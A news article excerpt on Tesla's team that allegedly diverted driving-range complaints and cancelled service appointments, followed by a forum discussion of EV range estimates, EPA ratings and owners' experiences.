Tesla supervisors told some virtual team members to steer customers away from bringing their cars into service whenever possible. One current Tesla "Virtual Service Advisor" described part of his job in his LinkedIn profile: "Divert customers who do not require in person service."
Such advisors handled a variety of issues, including range complaints. But last summer, Tesla created the Las Vegas "Diversion Team" to handle only range cases, according to the people familiar with the matter.
The office atmosphere at times resembled that of a telemarketing boiler room. A supervisor had purchased the metallophone – a xylophone with metal keys – that employees struck to celebrate appointment cancellations, according to the people familiar with the office's operations.
Advisers would normally run remote diagnostics on customers' cars and try to call them, the people said. They were trained to tell customers that the EPA-approved range estimates were just a prediction, not an actual measurement, and that batteries degrade over time, which can reduce range. Advisors would offer tips on extending range by changing driving habits.
If the remote diagnostics found anything else wrong with the vehicle that was not related to driving range, advisors were instructed not to tell the customer, one of the sources said. Managers told them to close the cases.
Tesla also updated its phone app so that any customer who complained about range could no longer book service appointments, one of the sources said. Instead, they could request that someone from Tesla contact them. It often took several days before owners were contacted because of the large backlog of range complaints, the source said.
The update routed all U.S. range complaints to the Nevada diversion team, which started in Las Vegas and later moved to the nearby suburb of Henderson. The team was soon fielding up to 2,000 cases a week, which sometimes included multiple complaints from customers frustrated they couldn't book a service appointment, one of the people said.
The team was expected to close about 750 cases a week. To accomplish that, office supervisors told advisers to call a customer once and, if there was no answer, to close the case as unresponsive, the source said. When customers did respond, advisers were told to try to complete the call in no more than five minutes.
In late 2022, managers aiming to quickly close cases told advisors to stop running remote diagnostic tests on the vehicles of owners who had reported range problems, according to one of the people familiar with the diversion team's operations.
"Thousands of customers were told there is nothing wrong with their car" by advisors who had never run diagnostics, the person said.
Reuters could not establish how long the practice continued.
Tesla recently stopped using its diversion team in Nevada to handle range-related complaints, according to the person familiar with the matter. Virtual service advisors in an office in Utah are now handling range cases, the person said. Reuters could not determine why the change was made.
On the road
By the time Alexandre Ponsin reached California on his March road trip, he had stopped to charge his Model 3's battery about a dozen times.
Concerned that something was seriously wrong with the car, he had called and texted with several Tesla representatives. One of them booked the first available appointment in Santa Clara – about two weeks away – but advised him to show up at a Tesla service center as soon as he arrived in California.
Ponsin soon received a text saying that remote diagnostics had shown his battery "is in good health."
"We would like to cancel your visit for now if you have no other concerns," the text read.
"Of course I still have concerns," Ponsin shot back. "I have 150 miles of range on a full charge!"
The next day, he received another text message asking him to cancel the appointment. "I am sorry, but no I do not want to close the service appointment as I do not feel my concerns have been addressed," he replied.
Undeterred, Ponsin brought his car to the Santa Clara service center without an appointment. A technician there told him the car was fine. "It lasted 10 minutes," Ponsin said, "and they didn't even look at the car physically."
After doing more research into range estimates, he said he ultimately concluded there is nothing wrong with his car. The problem, he said, was that Tesla is overstating its performance. He believes Tesla "should be a lot more explicit about the variation in the range," especially in very cold weather.
"I do love my Tesla," the engineer said. "But I have just tempered my expectation of what it can do in certain conditions."
Range Rage
By Steve Stecklow in London and Norihiko Shirouzu in Austin
Additional reporting by Heekyong Yang and Ju-min Park in Seoul and Peter Henderson in San Francisco
Art direction and lead illustration: Eve Watling
Video Production: Lucy Ha and Ilan Rubens
Edited by Brian Thevenot
Not just battery and range.
I've had problems with the passenger side airbag not enabling, and turn signal not working. Both scary issues. Made appointments with the support. Both were cancelled outright by them (!). They tried to convince me that there was no problem, and it was all due to the way I use the car. They seemed to try everything to get out of appointments. My wife had to use the back seat for a month while I argued with them.
Eventually both problems were resolved by software updates, proving that the problems were indeed on their side.
'turn signal not working.' Oh that explains why Tesla drivers never seem to signal! ;-)
Seriously, sorry you've had such a bad experience with Tesla service.
I thought it was just me! Trying to control turn signals is beyond infuriating in a Model Y. You would think that this should be part of the functionality that is largely free of bugs..
'My wife had to sit at the back of the car for a month while I argued with them.'
She must have enjoyed having a chauffeur for a month...
> My wife had to use the back seat for a month
Is the back seat safer than the front seat, even if the front seat airbag doesn't deploy? I know recent tests show the back seat is a good bit less safe, and I think it's primarily due to most manufacturers not using the same seat belt technology as they do in the front, but maybe some of that is the lack of a front airbag.
The airbags needing a software update in the first place is terrifying.
Since cars have integrated phone-home diagnostic software, why would the government even allow automakers to advertise 'estimated' ranges for specific car models and not simply show actual averages?
I had an uber driver that said his 3 had less than half the range when temperatures got over 100F (38C). I imagine that is just the increased load from the cooling system. My Y sounds like a combustion car the ac runs so loud the past couple months. I leave the display on battery percentage because the range counts down very quickly in this heat. But it doesn't when it is nice out. Cold decreases the range because the battery heater has to work hard.
My point is that it isn't as simple as an average due to the massive temperature sensitivity. It applies to ICE cars too, but it certainly isn't as noticeable as the engine allows a wider range of temperatures. Ironically the EV is proposed as something to battle climate change, but it is much more susceptible to it's effects.
That gets affected by the kind of people driving the car, and just because I buy a certain car doesn't mean I'm like the other people who bought it. Also, too easy to hack that.
The article ends:
> [one customer] ultimately concluded there is nothing wrong with his car. The problem, he said, was that Tesla is overstating its performance
As I read this, either his car was defective or he was lied to to convince him to make a $XX,000 purchase. It seems that Tesla should be facing some form of fraud-based lawsuit over the lies selling the car or treating it under warranty, right?
Tesla has more lawyers than you do. Bringing a lawsuit for fraud, which you may not win, will cost you $10-20k cash out of pocket up front.
Tesla advertises the EPA rated range. The car not actually achieving that range in real world conditions (which are more varied than the test conditions) is not necessarily defective or false advertising.
Now I do think that the EPA ratings are inadequate and inconsistent. Those could use some improvement to better reflect real world driving conditions.
Most normal Tesla owners I'm familiar with just come to accept that the website range claim is complete horseshit. They go on with their lives and just don't worry about it. For around town, it'll get somewhat close to rated range anyway, and road trips aren't that common for most people. The supercharger network is pretty good, and if you have to stop every 200 miles instead of the rated 358, then so be it.
Personally I think the EPA should revamp the rating system. I want to see every manufacturer forced to admit what range to expect if we use 90% of the battery capacity, at 70 mph, in 32F ambient temperature with climate control set to 68F. The only time people really care deeply about range is on the interstate, so the range numbers really ought to reflect that.
Many who buy EVs have range anxiety. Easiest solution for Tesla? Lying about the (remaining) range.
Many consumers wrongly believe that they need a lot more range than they actually do, and you can't really convince them otherwise because it's an emotional issue rather than a pragmatic one. What Tesla did was immoral but I get why they did it.
Tesla doesn't let you get you stranded on the side of the road. You'll still get directed to a Supercharger if you are unable to reach your destination. But you don't get an accurate range estimate when your car is fully charged, and this has been known for a long time.
Thanks Tesla, but I'll stick to a car that doesn't try to work around my emotional problems.
> Tesla doesn't let you get you stranded on the side of the road
Unless you don't use their nav, the conditions are bad, or you need to take a detour. To drive 40mi, I want 60mi range to cover my bases, considering the consequences of getting stuck vs just charging a little longer.
A lot of comments are discussing the difficulty in estimating range accurately or how all EPA estimates are inflated. But the article claims Tesla knowingly uses an algorithm with inflated numbers and swaps the rost estimate out for a more accurate estimate at 50% charge. That's different than a good faith attempt at estimating range and a dark pattern.
I was trying to interpret what that means. I'm guessing they aren't factoring current conditions above 50% and instead rely on average conditions. I'd be surprised if this is actually worse than what the EPA views as average given the truth-in-advertising requirements they put on Tesla.
This isn't entirely unreasonable. Most people whose battery is at 80% aren't going to be depleting it in the next few hours, so say factoring the present cold morning might produce overly pessimistic guesses.
They are being aggressive for sure, but this article strikes me as pretty biased against Tesla. The article concedes that most of these customers have no range problems -- they are probably driving in cold at 80 MPH blasting their heat to 70 degrees wondering why their range is so poor -- even though it is entirely expected behavior.
When you market cars need on known false numbers, it sounds a lot like criminal fraud
Man. I love my Tesla (please car manufacturers hire good software engineers, pay them better and let them do their thing).
But screw that guy. I don't think we'll be buying another one.
It's time for a class action lawsuit and to be rid of him.
I just hope some car manufacturers continue to not hire UX designers and have everything not related to the actual operation of the car (controlled by physical switches) just be a dumb screen for my phone to control.
That's a pretty damning article and it looks like there are more and more of those coming.
Tesla still somehow benefits from its innovators / clean company reputation, but at this pace it won't be long before agencies start to act on what's become much more than just 'optimistic marketing'.
I think that reputation already died in the last 2-3 years.
It's now pretty common in my circle to hear people say they'll pay a premium to not own a Tesla. Primarily because of lots of bad experiences with build quality/repairs, but also because there are now lots of high quality alternatives. Namely Rivian and Lucid, but also the legacy automakers (two friends bought mach-es recently and there's a smattering of F-150 lightnings.)
The fact that Musk has adopted the public persona of a crazy uncle who doesn't get Thanksgiving invites -- and is heavily associated with the Tesla brand -- doesn't help either.
I'd like to see more data...
For example, if you get 10 tesla cars of the same model, do the ranges differ?
If you get 1 car and 10 different drivers, do some drivers get the advertised range while others don't?
If you disassemble the battery packs, do you find some bad/degraded cells in cars with reduced range, or is this a design fault?
Do drivers that have trouble have inefficient mods, like roof racks, big wheels, etc?
>agencies start to act
Uber is still a publicly traded company, despite explicitly starting up by just ignoring and bypassing existing regulation.
The US is so anti-consumer it will never relevantly punish a business making money.
> "We're looking at the range, and you literally see the number decrease in front of your eyes," he said of his dashboard range meter.
Well, I'm not sure what the range meter is supposed to do? Freeze when an eye tracker detects the driver looks at it?
Or maybe he was idling the car in cold weather. Even without the heater running, the battery cools down and that can reduce the range.
Electric vehicles aren't perfect and some little education can prevent a lot of frustration.
Thats the crux of the complaint tho, if the number requires education the number should not be used without context and something more realistic should be used. If on average the car does 250 miles it should not be advertised as 400. Either a range or a disclaimer should be present.
I think the 'number decreasing' complaint seems to be related to the fact that you would drive 10 miles and lose 30 on the dash. The article also claims the number becomes more realistic when it crosses bellow 50% charge so I expect this difference to be noticeable.
How does the Tesla advertised range compare to the advertised range of other EV makers: less accurate, or similarly inaccurate?
edit: 'advertised' I mean the range shown on the dash. I.e. the range communicated by the car itself, as relevant to this article.
This might help but requires you do some cross referencing and math: https://ev-database.org/cheatsheet/range-electric-car
This is better as it shows the claimed range, and the actual range: https://insideevs.com/reviews/443791/ev-range-test-results/
I mean, I realise that reading the article is considered most improper on this website, but it _is_ addressed.
I frequently drive a Skoda Enyaq. The 'official range' figure is 330 miles, but we actually get 250-290 miles in real life usage depending on temperature. When you turn the car on with a full battery, the range estimate for us reflects actual distance not 'official' distance and seems extremely accurate and trustworthy.
It's a bit average. It's not crazy optimistic like some Chinese brands or a bit pessimistic like some German brands.
Here is a Norwegian winter test in real conditions: https://nye.naf.no/elbil/bruke-elbil/test-rekkevidde-vinter-...
You can use a translator (Google, DeepL, chatGPT...) but the Arabic numbers are easy to spot.
One datum: our 2014 BMW i3 (ev, no range extender) consistently outperformed its rated range.
> How does the Tesla advertised range compare to the advertised range of other EV makers: less accurate, or similarly inaccurate?
Read the article. This is covered in depth and it's quite informative.
My 2015 85D's battery, with only 70k miles, died the day after the warranty expired.
$15k to have them out in another refurbished, 8yo battery. And they kept mine to resell to someone else for $15k.
Any other company I'd say it's a coincidence. But I suspect it was suppressing errors during the warranty period :/
Don't you think if there was an intentional conspiracy to do this they would make it a little less obvious by not activating battery self destruct the day after the warranty ended? I'd have made it wait at least a month afterwards...
I don't really get the range complaints at this point, with an ICE vehicle people rarely know their range they just look at a gauge for F to E.
With the superchargers, range doesn't really have a material effect anymore and most of the time the network isn't necessary anyway.
It's not a real issue.
That's because, even today, gas stations are far more ubiquitous than charging stations. People who own IC cars don't pay that much attention to range because there's rarely a question that they'll find a gas station within their last remaining gallon. With electric, that's a bit of a different story, especially when you're driving a long distance, and to somewhere that's not a major metropolitan city with thousands of Tesla owners.
> It's not a real issue.
+1, I was worried about range before I bought a Model Y, but charging at home and trip planner I never even think about range anxiety at all.
The driving range isn't bad though. You just need to know what you're getting into when you do your research. I'm not justifying Tesla. I'm saying that most complaints are users who don't research the product before using it. This gives me a headache.
> You just need to know what you're getting into when you do your research.
If only they didn't have a secret team to suppress the kind of things you would really want your research to turn up.
As a Tesla owner, I think the source of the confusion is the EPA range displayed in the HUD on the Tesla. We toggled ours to show the battery percentage, which is much more useful to us.
We've never owned a gas vehicle that met it's EPA range and the Tesla is no different. No one takes EPA MPG * GALLONS of gas and expects it to be a real life estimate of range.
Wind resistance increases EXPONENTIALLY with speed. Drive a little over the speeds the EPA used to determine range, and the observed range will drop significantly as a percentage when compared to the EPA range for any vehicle.
If you do have a Tesla, you'll quickly find out that the trip computer is very accurate. The worst I've seen is a cold January day in Wisconsin (-10F) while on a road trip with a head wind. In that scenario, the trip computer was off by 7% mostly due to the head wind. In the summer, it is spot on usually within 1 - 2%.
I had a Mazda 3 once which would routinely beat its EPA estimates, especially highway driving. You are too forgiving of Tesla's business gimmicks
I drove a Tesla for over a month and it was a relief to go back to my Honda Civic. The range (both miles and %) was wildly inaccurate. If I had to drive anywhere that wasn't a few miles within the city, I was under constant anxiety. No thank you.
It's a wonder to me that anyone would ever trust anything Elon Musk ever says about anything. He's a proven liar and creates an openly hostile, negative culture wherever he goes. I feel sorry for people who are caught up in his lies, either customers or employees or people who work closely with him and have to suffer his tantrums. There was a point I admired him, but that is long past.
>Wind resistance increases EXPONENTIALLY with speed.
And the power required to move against the air is the cube, not the square!
FWIW Our Audis (Q5, A6 allroad) have significantly better MPGs than the advertised ones
The Q5 advertises 28mlg on the highway but i consistently hit 30+ here
And the wagon hits 35mpg on the highway very often even though it only advertises 26. It actually turns off 2 of the 6 cylinders when it senses that it can.
Both cars I've owned have had better efficiency and thus range than advertised (a Honda and a Subaru). I'm often shocked at how I can get 38-40mpg + on a car that is supposed to be getting 29mpg.
> We've never owned a gas vehicle that met it's EPA range and the Tesla is no different. No one takes EPA MPG * GALLONS of gas and expects it to be a real life estimate of range.
Because gas stations are still far more common than fast chargers. We'll get there with EV charging, but right now range does matter, especially if you routinely see half of what was advertised.
I think this is a problem because a lot of what people use to shop an EV is the headline range number, which you are declaring is not accurate. This is false advertising.
I think the difference is that a gas-powered car will keep driving when the gas indicator hits zero. You can still get a couple dozen miles at that points, and those are so important. Tesla is really doing you a disservice by not considering that.
Aerodynamic drag increases as a square as a function of velocity, not exponentially.
My 2021 Honda CR-V doesn't get close to EPA MPG but the range calculator is still accurate to within maybe 15%. I've tested it a few times driving from Oakland to LA which is right around the full range of the car and it gets pretty close- even with a whole mountain range to drive over north of LA. It doesn't appear to use EPA MPG for its estimates and it makes for a better experience.
> We've never owned a gas vehicle that met it's EPA range and the Tesla is no different. No one takes EPA MPG * GALLONS of gas and expects it to be a real life estimate of range.
Why is this exactly? It's been true - MPG is lower than estimated - of every vehicle I've owned too except for my most recent, a '23 MX-5 (i.e. a sports car, which I tend to drive at higher RPMs and in lower gears.) I'm getting spot-on or a little above the EPA estimated on the car I'd least expect it.
(edited to clarify 'it's been true')
The article says that Tesla knowingly overestimated their numbers. Tesla even switches the range algorithm to be more accurate when mileage gets to 50%.
> We've never owned a gas vehicle that met it's EPA range and the Tesla is no different
Car and Driver's EPA range versus real world highway tests:
https://www.caranddriver.com/news/a43657072/evs-fall-short-e...
EVs are quite different to ICE when it comes to EPA range ratings.
My EPA highway mile rating is lower than I see in actual driving in my ICE. City is about accurate unless I've been in a lot of traffic's with its look back range for live mpg estimates. Lots of owners of other EV brands and the article itself said they're much better than Tesla's estimate as well. It's difficult to see how the issue is anything but specific to Tesla and its method of presenting info to consumers. They were even force to lower their previously stated range, per the linked article.
This is what small claims court is for. No lawyers. Cheap. Just a video of real range, the lies, get 20k or what not rebate due to the lies.
Last I checked, small claims court in more than one state tops out at well under $10K. Hence the adjective "small".
IOW, you ain't getting $20K out of small claims court.
"In March, Alexandre Ponsin set out on a family road trip from Colorado to California in his newly purchased Tesla, a used 2021 Model 3. He expected to get something close to the electric sport sedan's advertised driving range: 353 miles on a fully charged battery.
He soon realized he was sometimes getting less than half that much range, particularly in cold weather – such severe underperformance that he was convinced the car had a serious defect."
He simply does not understand how batteries and power delivery work. Driving through the Rocky mountains will reduce mpg significantly for an internal combustion engine as well. Colder temperatures require a heater and less efficient for batteries due to increased viscosity of electrolyte fluid. All a perfect storm for poor EV performance.
They come up w/ the range under absolute perfect driving conditions that don't actually exist. The driving conditions should reflect normal driving conditions.
> Driving through the Rocky mountains will reduce mpg significantly for an internal combustion engine as well.
Do you mean it will reduce the mpg because of reduced air density, or because of temperature as well? I thought the efficiency of an ICE was dependent on the difference in temperature it creates between the combustion and the coldest part of the cycle. It seems efficiency would improve in cold temperatures because less energy would be wasted cooling the engine since the incoming air is doing that.
Sure, but the system continues to make extremely optimistic (and unrealistic) estimates about your range until you hit 50% battery, at which point it tries to be more realistic so that it doesn't strand you in the middle of nowhere.
It should be giving you the more realistic estimate as soon as possible, so that you can plan better, rather than misleading you for half your trip.
Perhaps the range advertised should call out the variance, or use a more pessimistic number?
Much like MPG is denoted as city vs highway.
It's a controversial opinion but I really believe EV's need 500 miles of range to truly compete with ICE vehicles.
Think: batteries not fully charging or depleting for longevity concerns. Having to stop at chargers before range is out due to there not being another one coming up, extra headwinds, extra heat or AC, simply ending up at a broken or crowded charger and needing it to a different one, pulling a load, etc, etc.
Most people never leave their city.
For those of us who do, the small number that do road trips can easily get by with one ICE and one EV.
Most people's EV need to get to the grocery store or to work and back.
Maybe it's more important to have more/faster EV charging stations. I'm not buying an EV until I can go to any regular gas station (or at least half of them) and charge it up in a similar timespan as an ICE. That should be doable.
I'd like to be able to go 200 miles at 85mph, and do it between 80% and 20% of charge (so I can supercharge quickly and not worry about range at the bottom end) That would equate to a single stop on my typical family road trip. That's 333miles at 85mph. My Model 3 can't do that. Hoping the high end Cybertruck can get close.
I think you're wrong. The vast majority of 'trips' are well below current ranges afforded by today's technology. Most electric car users are plugging in when they get home and never have to charge elsewhere.
Furthermore battery technology is actually improving and the trajectory seems to indicate that there will be cars that will be able to hit the 1000km range within the next 5 years for those who would need it.
Is there some huge percentage of people that road trip every week? I commute to/from work, run errands, go around town, and my car is back in my garage about 340 days a year. I drive over 250-300 miles in a day maybe 4 times a year. If I am plugging my car in every night or every other night, I'm only going to need to think about Fast Chargers a few times a year. Either people are treating EVs like ICE cars and 'filling up' at a Fast Charger instead of just plugging their car in at the end of the day, or people are taking way more road trips than I realize.
ICE vehicles have the same issue with range, but we don't focus so much on it, I think because we just believe that the range os enough, and if I need to refuel I can do that just about anywhere quickly. In those cases that we are heading into an area where that might not be true, we check our fuel and ensure we're topped up to get all the way through.
I wonder if the reason is focusing on a specific range, rather than a fuel capacity. Gallons is a pretty intuitive quantity that people are comfortable understanding. Maybe we need to focus away from range for EVs and instead focus on kWh capacity of the batteries. This is apparently less useful, since I really care about actual range - but it's more accurate and allows me to use my human understanding to think about whether I have enough relative to my driving circumstances. Just like with gallons of gas.
can you expand on how ICE vehicles have the same issue with range?
I rode ebikes for commuting about 15 years ago. Looking at electric cars, I need at least double whatever specs they state for max range. So if I need 400 miles for instance, I need to find a manufacture promising 800. Wind, cold, age of battery, emergency reserve etc all play into it.
Why do they call it a 'secret team'? Why do they call it 'complaints'?
As said in the article, these are not complaints, but service appointments. Creating a team to handle these unnecessary appointments is completely normal. There's nothing secret about this team.
I was confused too. Title and first part suggested they were trying to suppress discussion about range issues. Then the rest was about cancelling service appointments. I'm pretty sure this is just a hit piece.
This really shouldn't be read as a defense of EV companies, but I think there is just a learning curve for EVs which people really haven't grappled with yet.
Here is a minor list of things which will reduce range pretty significantly:
- Driving over 50 MPH
- Using the AC
- Using the heat
- Driving in extreme cold or extreme heat
- Driving in an area with a lot of hills. (From what I can tell regenerative braking makes up less than it loses for a given hill. If anyone can correct me here, let me know)
- Accelerating more than necessary
- Not making full use of regenerative braking
- Driving on the highway rather than around town (see the 50 MPH comment)
Are these concessions OK? Is it just a matter of better education and more honest marketing? That's sort of for everyone to decide collectively. One thing that is for sure is that EVs have a totally different set of quirks and limitations than ICE vehicles, and that will have to be adjusted for one way or another. It's also worth noting that most of the things listed above _also_ adversely affect ICE vehicles, however not necessarily as much, or it's not felt directly because getting gas is very convenient.
It also strikes me that anything which adversely affects MPG in an ICE vehicle can also be said to "reduce range." You're losing miles off your current tank of gas. Presumably because the range is so small, and recharge opportunities are so limited, this affects people in EVs more strongly than in ICE vehicles. Perhaps if both were improved (battery capacity and charging infrastructure) then these concerns would evaporate.
What you say about the reduced range makes sense but I don't fully trust the decision on what range to show to have all the right motives in this case when many other manufcaturers (also in ICE vehicles) adjust their shown range based on recent drives. Tesla does do this if you plan a route so they are certainly capable but unlike the mentioned toyotas, bmw's, etc they choose to use the unchanging unrealistic estimate that gets a lot of people in trouble. Given that they also stonewall when its about issues that people can't affect with their driving style or can be a matter of opinion I don't feel inclined to give them the benefit of the doubt and say maybe people should adjust their behaviour and expectations. If they are given more accurate mileage by default then it's after all much easier for them to make those considerations and realisations about what affects it.
I have a mental model which goes something like this:
When 80% of your energy goes to waste than all the incidentals like AC and especially heating just does not surface as a contributing factor.
When however 80-90% of energy goes to driving, then speed and all the accessories start having a real impact.
It also shows how energy dense gasoline/diesel are that a 50kg tank will outperform 400kg batteries even with the 4-5x efficiency difference.
> Here is a minor list of things which will reduce range pretty significantly:
Bit of a sarcastic take: apparently also use of indicators.
Actually, gas cars have the best range on highways because the engine can stay at peak efficiency, electric cars are best in the city because they only use energy when moving and can recover energy from slowing (i.e. stop and go). And others mentioned that heating is free in gas cars (in fact it might improve your cooling and thus efficiency).
What does any of this have to do with the fact that Tesla is lying to its customers and the other EV manufacturers are not.
> - Driving on the highway rather than around town (see the 50 MPH comment)
That would greatly depend on the town one is picturing. In pretty much any neighborhood in LA, there's no way you're going to sustain a speed of 50 mph for any reasonable period of time without frequently stopping at intersections, your usual traffic congestion, pedestrians wandering into the street, other drivers making idiotic maneuvers, etc. No way is your mileage going to be better on surface streets even if you do your best to reach 50 mph but not exceed it. Frequently braking and accelerating requires more gas than will be eaten up by driving at a constant speed of 65 mph.
>Inside the Nevada team's office, some employees celebrated canceling service appointments by putting their phones on mute and striking a metal xylophone, triggering applause from coworkers who sometimes stood on desks.
It's weird how this sentence was probably supposed to surprise the reader, but I really just reflected on how the fans conduct themselves regularly and thought "yup, sounds about on par".
Why a xylophone and not a bell? Seems like an odd choice for an instrument other than it's name also starts with an x...
> I really just reflected on how the fans conduct themselves regularly
Reminds me of that youtube video (by a fan) almost having an accident on autopilot and his first reaction was 'we're gonna have to cut that out'.
This is standard Weird Sales Culture stuff, but it's a bit odd for customer support.
Just like a scene out of The Wolf of Wall Street. This company appears to be fraudulent to the very core.
I have an S so I'm biased but this feels like a hit piece.
Range is of course always going to be an estimate. Marketing is always going to be a battle of who has the bigger number. Having people schedule an appointment to fix their 'broken' cars that can only go 470 instead of 500km is of course going to be a waste of time and money.
I'm part of a facebook group for tesla owners and literally every day this week there has been a post that goes something like 'I left my house with 500km, drove 1km and now it says 497km. Should I schedule an appointment?' With the common advice being to switch to % instead of distance and remember that it's an estimate.
While I think Tesla (and most manufacturers) could do a better job at education, and of course having empathy for people who have spent a lot of money on something and worried it's defective, I don't think anything in this article is as damning as it sounds.
You should have higher expectations of your vehicle.
My 2016 ICE car's 'miles left' meter is accurate to +/- 2 miles from the moment I top up the tank (80% highway driving, 20% hilly city and rolling country roads).
IMO, accurately telling the vehicle operator how many miles of juice you have left is a KPI, as it informs when you'll need to plan for refueling.
Having driven an EV for a few weeks in identical conditions, this inaccuracy is probably the major contributor to 'range anxiety'. I have no idea whether I'll need to recharge in 60 miles or in 25 miles, and that's totally unacceptable in most parts of the US (where there aren't available chargers every 5 miles of your trip).
You are extremely biased. I have both owned a Tesla and non Tesla EV. Non Tesla EVs are way more conservative in their range estimates and you can actually beat their estimates. People routinely beat BMWs advertised EPA range - something you will never hear for a Tesla
I've owned EVs from different brands, including Tesla. In my experience so far, only Tesla uses the naive and wildly optimistic EPA number for the range display. My wife drives a Bolt and it uses your moving average to calculate the range estimate, and it's pretty much dead-on accurate.
Tesla -could- do it but chooses not to. Put it in trip mode and it's pretty close to dead-on. Look at the consumption page and it's pretty accurate there too. Tesla elects not to use this already available information, because it would consistently show people a lower number than what the web page did when they ordered the car.
What this article describes, if true, is actionable fraud. I'm not seeing this as a "hit piece."
Literally the first paragraph of the piece:
> He expected to get something close to the electric sport sedan's advertised driving range: 353 miles on a fully charged battery.
> He soon realized he was sometimes getting less than half that much range
We're not talking about a couple of miles here or there.
And if Tesla discovered that range issues (even if entirely based around customer perception) were a widespread enough issue to set up a team specifically to address it, that team said nothing publicly and instead cancelled service appointments without explanation... that's absolutely newsworthy, whether you consider it a "hit piece" or not.
> Inside the Nevada team's office, some employees celebrated canceling service appointments by putting their phones on mute and striking a metal xylophone, triggering applause from coworkers who sometimes stood on desks. The team often closed hundreds of cases a week and staffers were tracked on their average number of diverted appointments per day.
I mean... c'mon.
But the example from the article wasn't about a sub 1% delta. It was someone getting less than half the estimated ranged.
This isn't a hit piece. As someone that formerly owned a Tesla, all of this rings true and I was so glad to finally ditch the vehicle back to the second hand market.
Is this any different than companies paying public relations departments to salt the media and internet with positive stories, and downplay negative?
Of course, since Tesla doesn't need, nor have, a PR department (unless they silently re-established one again after closing the first one down in a rather public manner).
No, it's all the same and should be extremely illegal (read felony with mandatory minimums approaching life without parole) as such behavior is antithetical to democracy.
[flagged]
Just curious, did you ever own a high end vehicle before your teslas?
> There are so many people out to get Tesla right now it's hard to process stories like these: the legacy auto makers, their supply chains, their unions, their dealers, the shorts, the elon haters, the ev haters, and on and on. > There are also a ton of click bait faux outrage articles in general about every subject you can imagine.
I can't help but be disheartened at the financialization (?) of everything. Can't tell who's real and who's shorting.
> There are so many people out to get Tesla right now it's hard to process stories like these
I have no dog in this fight. Never owned or thought about buying a Tesla. The details described in the story, if true, are very serious. Are you suggesting the story is made up?
I'm a firm believer in the idea that people can be brilliant in one way and dumb in many others. Elon seems hellbent on showing us all the ways he's dumb.
Sounds like you're an American who's either a Tesla employee or only owned American cars before. Their quality is mid-tier at best but the software appears to be so dangerous that I avoid driving behind/in front of a Tesla (in Europe).
> Each one of them has been the best car I've ever owned and better than the one before it.
If you buy a new car chances are it will be the best car you've ever owned and better than anything you've driven before.
'I like X, therefore any negative information about X is lies propagated by their enemies' is a dangerous position to take.
'The directive to present the optimistic range estimates came from Tesla Chief Executive Elon Musk, this person said.'
'"Elon wanted to show good range numbers when fully charged," the person said, adding: "When you buy a car off the lot seeing 350-mile, 400-mile range, it makes you feel good."'
Yep, the great Technoking's narcissism manifesting itself in critical technology decisions. Hopefully the ongoing stories of severe mismanagement at Tesla will show people that severe personality flaws matter, especially in technology.
My wife's car broke down, and she took my Subaru for the week, so I ended up with a Chevy Bolt. It wasn't a Tesla, but it was an eye opener for me. Cost per mile was about the same as the Subaru, and the Subaru was a bigger car. Charging was slow and inconvenient. Range? Was really hard to predict in the Bolt because how you drive the vehicle has a big effect on what you get. I was really disappointed in the whole EV thing.
It doesn't help that the Bolt is the worst EV on the market besides the Leaf, mostly due to price point. You also wouldn't notice the charging being slow as much if you had a charger installed in your garage, cheaper too.
All that being said, having driven both, it's no competition a Tesla is far better in every conceivable way. The Model 3 is more efficient with its energy as well.
Giving optimistic estimates based on generalized vehicle information, then giving more precise estimates after the 50% mark—and after having collected usage information based on the user's actual environment—sounds to me like a decent algorithmic solution to a hard problem.
It sounds like a terrible solution to an easy problem. And calling it an 'algorithmic solution' is being generous, considering that our dead simple decade old Mazda 2 gives us a closer than 25% range estimate just based on the mpg for the previous X number of miles driven. That's not an algorithm, that is a simple math calculation with only two inputs; gas consumption rate and miles driven. Tesla, with thousands of data points on previous usage and driver behavior, could give you an almost dead accurate estimate, but chooses to give a basically useless estimate because it looks better. Then people come around and make ridiculous excuses for it and why its actually a "decent solution" (it isn't) to a "hard problem" (its not).
Hum... ICE vehicles have given their range in litters for decades, and nobody every had a problem with it.
They recently stated giving estimates in distance, but it's clearly marked as an unreliable estimation.
Looks like Tesla has another huge communications and UX issue, and not a mechanics (electric?) one. They have to get their designers in a room, fire the management, and ask them to actually design stuff for humans.
That only makes sense if there's strong correlation between the first 50% of a charge and the second 50% of a charge, but NOT an equally strong correlation between the previous charge cycle and the current charge cycle.
That can be the case (eg on road trips) but usually isn't.
Why not just always give the more precise estimates?
Carwow did a test fairly recently: https://www.youtube.com/watch?v=fvwOa7TCd1E
I didn't watch the whole video, but found the summary to be helpful. You can see it at 37m21s: https://youtu.be/fvwOa7TCd1E?t=2241
spoiler: Of the 6 cars they tested, Tesla Model Y had the best performance in terms of miles per kWh and total range. But it still clocked in at only 81% of claimed range.
This is why I don't want a car with OTA updates.
At least a dealer flash will take many months to be deployed and show up these deceptive practices.
What does this have to do with OTA updates? It could come with the same software "built to lie" from the factory as well, couldn't it?
I have two Teslas. On both of them, I get close to the EPA range in city driving and lose 15%-20% on highway driving at 70-80 mph, on typical daytime temperatures for my area, which rarely drop below 40F in the winter or exceed 100F in the summer. On highways I always use autopilot, which keeps speed much more constant than I would -- it brakes and accelerates much less frequently. The estimates for battery use on trips are always accurate. I consider driving a high-risk chore, so I'm not an aggressive driver.
YMMV.
I'm surprised by the reaction to this article.
1. The range is set by the EPA. They are the ones that do the testing and validate the claims. The EPA should fix their range guidelines for EVs. Maybe a summer and winter range would be more appropriate?
2. Tesla should have a better UI for range, but really they should just show the percentage. Acting like it is a conspiracy is a bit extreme. They are just doing EPA Range * SOC. Without knowing all of the variables of a drive, the estimated range is going to be wrong no matter what you do. People think that their way of being wrong is better than Tesla's. Maybe they're right but the best estimate is still when navigating to a destination, and this estimate Tesla does quite well.
3. Tesla is cancelling the service appointments because there is nothing they can do to 'fix' it. So why waste the time with a service appointment? They are just going to run the same diagnostics they ran remotely. Their software does a fantastic job explaining where your range is going. (https://www.teslaoracle.com/2022/09/26/tesla-new-energy-cons...)
> "We're looking at the range, and you literally see the number decrease in front of your eyes," he said of his dashboard range meter.
From the third paragraph
The EPA tests are poorly implemented, and there are two flavors of tests and the maker chooses which to run. Has to do with the number of 'cycles'. One of these tests tends to return fairly optimistic results, and is the one Tesla chooses for the EPA to run.
Further, EPA only tests at default settings. Some makers (ahem Tesla) default everything to the most range maximizing settings.
Next, car makers can market UP TO the EPA range, but can also market below. Tesla clearly advertises every mile they can, while the Germans undersell their range. You can see this across the board in the real-world range tests by InsideEVs, etc.
Holistically I think having a single EPA range number is wrong given how different highway & city range is for EVs. Just like ICE cars report highway & city MPG, EVs should report range in these 2 buckets.
